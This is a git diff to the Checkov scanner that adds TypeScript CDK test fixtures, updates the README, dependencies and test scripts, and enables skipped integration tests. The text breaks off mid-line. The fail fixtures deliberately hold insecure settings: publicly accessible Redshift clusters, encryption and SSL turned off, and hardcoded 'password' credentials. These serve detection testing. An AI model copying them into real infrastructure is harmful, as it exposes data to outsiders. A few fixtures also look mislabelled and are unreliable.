diff --git a/.github/checkov.yaml b/.github/checkov.yaml index 88c62f7cb00..5428125e94e 100644 --- a/.github/checkov.yaml +++ b/.github/checkov.yaml @@ -21,6 +21,15 @@ skip-path: - tests/terraform/runner/tf_plan_skip_check_regex/resource/tfplan1.json - tests/terraform/runner/tfplan2.json - tests/unit/test_secrets.py +- tests/terraform/runner/resources/example/example.tf +- tests/terraform/graph +- tests/terraform/checks +- /checkov/secrets/plugins/entropy_keyword_combinator.py +- /checkov/secrets/plugins/detector_utils.py +- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/pass.py +- /cdk_integration_tests/src/python/RedshiftClusterEncryption/pass.py +- /cdk_integration_tests/src/python/RedshiftClusterEncryption/fail__1__.py +- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/fail__1__.py - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail__2__.py - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.py - /cdk_integration_tests/src/typescript diff --git a/Pipfile b/Pipfile index c1439ae4053..c0cb695ddae 100644 --- a/Pipfile +++ b/Pipfile @@ -43,7 +43,7 @@ types-colorama = "<0.5.0,>=0.4.3" # REMINDER: Update "install_requires" deps on setup.py when changing # bc-python-hcl2 = "==0.4.2" -bc-detect-secrets = "==1.5.9" +bc-detect-secrets = "==1.5.11" bc-jsonpath-ng = "==1.6.1" pycep-parser = "==0.4.1" tabulate = ">=0.9.0,<0.10.0" @@ -86,6 +86,7 @@ license-expression = ">=30.1.0,<31.0.0" rustworkx = ">=0.13.0,<0.14.0" pydantic = ">=2.0.0,<3.0.0" botocore = "==1.34.25" +urllib3 = "*" [requires] python_version = "3.8" diff --git a/README.md b/README.md index 93a036272c0..557b9bf3bec 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ **Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages. -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](docs/7.Scan%20Examples/Helm.md), [Kustomize](docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](docs/7.Scan%20Examples/Dockerfile.md), [Serverless](docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](docs/7.Scan%20Examples/Bicep.md), [OpenAPI](docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning. +It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning. It performs [Software Composition Analysis (SCA) scanning](docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). @@ -37,21 +37,21 @@ Checkov also powers [**Prisma Cloud Application Security**](https://www.prismacl - [Getting Started](#getting-started) - [Disclaimer](#disclaimer) - [Support](#support) -- [Migration - v2 to v3](docs/1.Welcome/Migration.md) +- [Migration - v2 to v3](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Migration.md) ## Features - * [Over 1000 built-in policies](docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud. + * [Over 1000 built-in policies](https://github.com/bridgecrewio/checkov/blob/main/docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud. * Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files. * Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow files * Supports Context-awareness policies based on in-memory graph-based scanning. * Supports Python format for attribute policies and YAML format for both attribute and composite policies. - * Detects [AWS credentials](docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers. + * Detects [AWS credentials](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers. * [Identifies secrets](https://www.prismacloud.io/prisma/cloud/secrets-security) using regular expressions, keywords, and entropy based detection. * Evaluates [Terraform Provider](https://registry.terraform.io/browse/providers) settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform. - * Policies support evaluation of [variables](docs/2.Basics/Handling%20Variables.md) to their optional default value. - * Supports in-line [suppression](docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI. - * [Output](docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/). + * Policies support evaluation of [variables](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Handling%20Variables.md) to their optional default value. + * Supports in-line [suppression](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI. + * [Output](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/). ## Screenshots @@ -172,7 +172,7 @@ Check: "Ensure all data stored in the S3 bucket is securely encrypted at rest" Failed for resource: aws_s3_bucket.sls_deployment_bucket_name ``` -Start using Checkov by reading the [Getting Started](docs/1.Welcome/Quick%20Start.md) page. +Start using Checkov by reading the [Getting Started](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Quick%20Start.md) page. ### Using Docker @@ -462,13 +462,13 @@ Defaults: Contribution is welcomed! -Start by reviewing the [contribution guidelines](CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22). +Start by reviewing the [contribution guidelines](https://github.com/bridgecrewio/checkov/blob/main/CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22). You can even start this with one-click dev in your browser through Gitpod at the following link: [![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bridgecrewio/checkov) -Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](docs/6.Contribution/Contribution%20Overview.md). +Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](https://github.com/bridgecrewio/checkov/blob/main/docs/6.Contribution/Contribution%20Overview.md). ## Disclaimer `checkov` does not save, publish or share with anyone any identifiable customer information. diff --git a/cdk_integration_tests/prepare_data.sh b/cdk_integration_tests/prepare_data.sh index 45417830a62..8d3934facf1 100755 --- a/cdk_integration_tests/prepare_data.sh +++ b/cdk_integration_tests/prepare_data.sh @@ -19,9 +19,8 @@ # fi #done - -echo "creating report for CDK python" +echo "creating report for CDK" pipenv run checkov -s --framework cdk --repo-id cli/cdk -o json \ - -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json" + -d "cdk_integration_tests/src" > "checkov_report_cdk.json" #todo: iterate over all the cdk typescript checks - when ts supported in sast diff --git a/cdk_integration_tests/run_integration_tests.sh b/cdk_integration_tests/run_integration_tests.sh index c2f5351adee..24d4858dfc8 100755 --- a/cdk_integration_tests/run_integration_tests.sh +++ b/cdk_integration_tests/run_integration_tests.sh @@ -18,9 +18,9 @@ set_env_vars() { } prepare_data () { - echo "creating report for CDK python" + echo "creating report for CDK" python checkov/main.py -s --framework cdk --repo-id prisma/cdk -o json \ - -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json" + -d "cdk_integration_tests/src" > "checkov_report_cdk.json" } diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts index 0302a9c123a..7d297878ad3 100644 --- a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts +++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts @@ -6,7 +6,7 @@ class ALBListenerHTTPSStack extends Stack { constructor(scope: Construct, id: string, props?: StackProps) { super(scope, id, props); - new elbv2.CfnLoadBalancer(this, {}) + new elbv2.CfnListener(this, {}) } } diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts index ca091deeb80..ce4c92e42e2 100644 --- a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts +++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts @@ -6,12 +6,12 @@ class ALBListenerHTTPSStack extends Stack { constructor(scope: Construct, id: string, props?: StackProps) { super(scope, id, props); - new elbv2.CfnLoadBalancer(this, {protocol: 'HTTPS'}) - new elbv2.CfnLoadBalancer(this, {protocol: 'TLS'}) - new elbv2.CfnLoadBalancer(this, {protocol: 'TCP'}) - new elbv2.CfnLoadBalancer(this, {protocol: 'UDP'}) - new elbv2.CfnLoadBalancer(this, {protocol: 'TCP_UDP'}) - new elbv2.CfnLoadBalancer(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]}) + new elbv2.CfnListener(this, {protocol: 'HTTPS'}) + new elbv2.CfnListener(this, {protocol: 'TLS'}) + new elbv2.CfnListener(this, {protocol: 'TCP'}) + new elbv2.CfnListener(this, {protocol: 'UDP'}) + new elbv2.CfnListener(this, {protocol: 'TCP_UDP'}) + new elbv2.CfnListener(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]}) } } diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts index b3ca34937f0..51042e67b97 100644 --- a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts +++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts @@ -5,9 +5,7 @@ import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib'; class AmazonMQBrokerPublicAccessStack extends Stack { constructor(scope: Construct, id: string, props?: StackProps) { super(scope, id, props); - - new elbv2.CfnBroker(this, {}) - new elbv2.CfnBroker(this, {publiclyAccessible: false}) + new elbv2.CfnBroker(this, {publiclyAccessible: true}) } } diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts index 7b2f4b21999..e9da3de07b5 100644 --- a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts +++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts @@ -5,8 +5,8 @@ import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib'; class AmazonMQBrokerPublicAccessStack extends Stack { constructor(scope: Construct, id: string, props?: StackProps) { super(scope, id, props); - - new elbv2.CfnBroker(this, {publiclyAccessible: true}) + new elbv2.CfnBroker(this, {}) + new elbv2.CfnBroker(this, {publiclyAccessible: false}) } } diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts new file mode 100644 index 00000000000..0a4c784e132 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts @@ -0,0 +1,10 @@ +// SOURCE +import { DatabaseInstance } from '@aws-cdk/aws-rds'; + +// SINK +// SINK: Vulnerability found due to missing Multi-AZ setting +new DatabaseInstance(stack, 'MyDatabaseInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO), + vpc + // missing Multi-AZ setting +}); diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts new file mode 100644 index 00000000000..77af0d727c9 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts @@ -0,0 +1,10 @@ +// SOURCE +import { DatabaseInstance } from '@aws-cdk/aws-rds'; + +// SINK +// SINK: Vulnerability found due to missing Multi-AZ setting +new DatabaseInstance(stack, 'MyDatabaseInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO), + vpc, + multiAZ: true +}); diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts new file mode 100644 index 00000000000..d125920e0f8 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts @@ -0,0 +1,10 @@ +// SOURCE +import { DatabaseInstance } from '@aws-cdk/aws-rds'; + +// SINK +// SINK: Vulnerability found due to publicly accessible setting +new DatabaseInstance(stack, 'MyDatabaseInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO), + vpc + // publicly accessible setting missing +}); diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts new file mode 100644 index 00000000000..07d46be962d --- /dev/null +++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts @@ -0,0 +1,8 @@ +// SOURCE +import { DatabaseInstance } from '@aws-cdk/aws-rds'; + +// SINK +new DatabaseInstance(stack, 'MyDatabaseInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO), + vpc, publicly_accessible: true +}); diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts new file mode 100644 index 00000000000..c9758978076 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts @@ -0,0 +1,19 @@ +// FINDING +import { CfnClusterParameterGroup } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to Redshift not using SSL +new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', { + description: 'Parameter group for my Redshift cluster', + family: 'redshift-1.0', + parameters: { + require_ssl: 'false', // This should be 'true' to enforce SSL + }, +}); +new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', { + description: 'Parameter group for my Redshift cluster', + family: 'redshift-1.0', + parameters: { + random_param: 100 + }, +}); \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts new file mode 100644 index 00000000000..b5889acc482 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts @@ -0,0 +1,9 @@ +import { CfnClusterParameterGroup } from '@aws-cdk/aws-redshift'; + +new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', { + description: 'Parameter group for my Redshift cluster', + family: 'redshift-1.0', + parameters: { + require_ssl: 'true', // This should be 'true' to enforce SSL + }, +}); \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts new file mode 100644 index 00000000000..05a28ade2fb --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts @@ -0,0 +1,12 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to missing encryption at rest +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc, encrypted: false +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts new file mode 100644 index 00000000000..e3bb55c194b --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts @@ -0,0 +1,19 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to missing encryption at rest +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc, encrypted: true +}); +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts new file mode 100644 index 00000000000..2ba5ef3a2be --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts @@ -0,0 +1,13 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to missing logging enabled +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc + // logging enabled missing +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts new file mode 100644 index 00000000000..b3dc48a7820 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts @@ -0,0 +1,15 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to missing logging enabled +let bucketName; +let stack; +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'} + // logging enabled missing +}); \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts new file mode 100644 index 00000000000..2f3cd26fb8c --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts @@ -0,0 +1,13 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to publicly accessible cluster +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc, + publiclyAccessible: true, // publicly accessible cluster +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts new file mode 100644 index 00000000000..26fb3b30ba5 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts @@ -0,0 +1,20 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to publicly accessible cluster +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc, + publiclyAccessible: false, +}); +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts new file mode 100644 index 00000000000..b0c7319bae7 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts @@ -0,0 +1,12 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +// SINK: Vulnerability found due to Redshift cluster deployed outside of a VPC +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc: vpc +}); diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts new file mode 100644 index 00000000000..7aefe9c0d19 --- /dev/null +++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts @@ -0,0 +1,12 @@ +// SOURCE +import { Cluster } from '@aws-cdk/aws-redshift'; + +// SINK +new Cluster(stack, 'MyRedshiftCluster', { + masterUser: { + masterUsername: 'admin', + masterPassword: 'password', + }, + vpc: vpc, + clusterSubnetGroupName: 'name' +}); diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts new file mode 100644 index 00000000000..2068b290294 --- /dev/null +++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts @@ -0,0 +1,11 @@ +// FINDING +import { Bucket } from '@aws-cdk/aws-s3'; + +// SINK +// SINK: Vulnerability found due to S3 bucket missing block public ACLs +new Bucket(stack, 'MyBucket', { + blockPublicAcls: false, // This should be 'true' to block public ACLs +}); +new Bucket(stack, 'MyBucket', { + random_param: 'true' +}); \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts new file mode 100644 index 00000000000..a147d859ad5 --- /dev/null +++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts @@ -0,0 +1,8 @@ +// FINDING +import { Bucket } from '@aws-cdk/aws-s3'; + +// SINK +// SINK: Vulnerability found due to S3 bucket missing block public ACLs +new Bucket(stack, 'MyBucket', { + blockPublicAcls: true, // This should be 'true' to block public ACLs +}); diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts new file mode 100644 index 00000000000..dee086f3e1c --- /dev/null +++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts @@ -0,0 +1,8 @@ +// FINDING +import { Bucket } from '@aws-cdk/aws-s3'; + +// SINK +// SINK: Vulnerability found due to S3 bucket missing block public policy +new Bucket(stack, 'MyBucket', { + publicReadAccess: true, // This should be 'false' to block public policy +}); diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts new file mode 100644 index 00000000000..27861a97390 --- /dev/null +++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts @@ -0,0 +1,11 @@ +// FINDING +import { Bucket } from '@aws-cdk/aws-s3'; + +// SINK +// SINK: Vulnerability found due to S3 bucket missing block public policy +new Bucket(stack, 'MyBucket', { + publicReadAccess: false, // This should be 'false' to block public policy +}); +new Bucket(stack, 'MyBucket', { + random_param: false, +}); diff --git a/cdk_integration_tests/test_checks_typescript.py b/cdk_integration_tests/test_checks_typescript.py index 5390a1d849a..dbfe4b989b1 100644 --- a/cdk_integration_tests/test_checks_typescript.py +++ b/cdk_integration_tests/test_checks_typescript.py @@ -13,370 +13,417 @@ def failed_checks() -> Dict[str, List[Dict[str, Any]]]: yield report_failed_checks -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_131_ALBDropHttpHeaders(): - run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders", language="typescript") +def test_CKV_AWS_131_ALBDropHttpHeaders(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="ALBDropHttpHeaders", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_2_ALBListenerHTTPS(): +def test_CKV_AWS_2_ALBListenerHTTPS(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_2", policy_name="ALBListenerHTTPS", language="typescript") -@pytest.mark.skip(reason="Not supported yet") def test_CKV_AWS_59_APIGatewayAuthorization(failed_checks): - run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization", language="typescript") + run_check(check_results=failed_checks, check_id="CKV_AWS_59", policy_name="APIGatewayAuthorization", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_76_APIGatewayAccessLogging(): - run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging", language="typescript") +def test_CKV_AWS_76_APIGatewayAccessLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_76", policy_name="APIGatewayAccessLogging", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_120_APIGatewayCacheEnable(): - run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable", language="typescript") +def test_CKV_AWS_120_APIGatewayCacheEnable(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_120", policy_name="APIGatewayCacheEnable", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_95_APIGatewayV2AccessLogging(): - run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging", language="typescript") +def test_CKV_AWS_95_APIGatewayV2AccessLogging(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_95", policy_name="APIGatewayV2AccessLogging", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_73_APIGatewayXray(): +def test_CKV_AWS_73_APIGatewayXray(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_73", policy_name="APIGatewayXray", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_194_AppSyncFieldLevelLogs(): - run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs", language="typescript") +def test_CKV_AWS_194_AppSyncFieldLevelLogs(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_194", policy_name="AppSyncFieldLevelLogs", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_193_AppSyncLogging(): +def test_CKV_AWS_193_AppSyncLogging(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_193", policy_name="AppSyncLogging", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_82_AthenaWorkgroupConfiguration(): +def test_CKV_AWS_82_AthenaWorkgroupConfiguration(failed_checks): # need to wait for variable rendering in TS - run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration", language="typescript") + run_check(check_results=failed_checks, check_id="CKV_AWS_82", policy_name="AthenaWorkgroupConfiguration", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_131_AmazonMQBrokerPublicAccess(): - run_check(check_results=failed_checks, check_id="CKV_AWS_131", policy_name="AmazonMQBrokerPublicAccess", language="typescript") +def test_CKV_AWS_131_AmazonMQBrokerPublicAccess(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_69", policy_name="AmazonMQBrokerPublicAccess", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_96_AuroraEncryption(): - run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="ALBDropHttpHeaders", language="typescript") +def test_CKV_AWS_96_AuroraEncryption(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_96", policy_name="AuroraEncryption", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_166_BackupVaultEncrypted(): - run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted", language="typescript") +def test_CKV_AWS_166_BackupVaultEncrypted(failed_checks): + run_check(check_results=failed_checks, check_id="CKV_AWS_166", policy_name="BackupVaultEncrypted", + language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_174_CloudFrontTLS12(): +def test_CKV_AWS_174_CloudFrontTLS12(failed_checks): run_check(check_results=failed_checks, check_id="CKV_AWS_174", policy_name="CloudFrontTLS12", language="typescript") -@pytest.mark.skip(reason="Not supported yet") -def test_CKV_AWS_36_CloudTrailLogValidation(): - run_check(check_results=failed_checks, check_id="CKV_AWS_36", policy_name="CloudTrailLogValidation", language="typescript") +def test_CKV_AWS_36_CloudTrailLogValidation(failed_checks): + run_check(check_results=failed_checks, 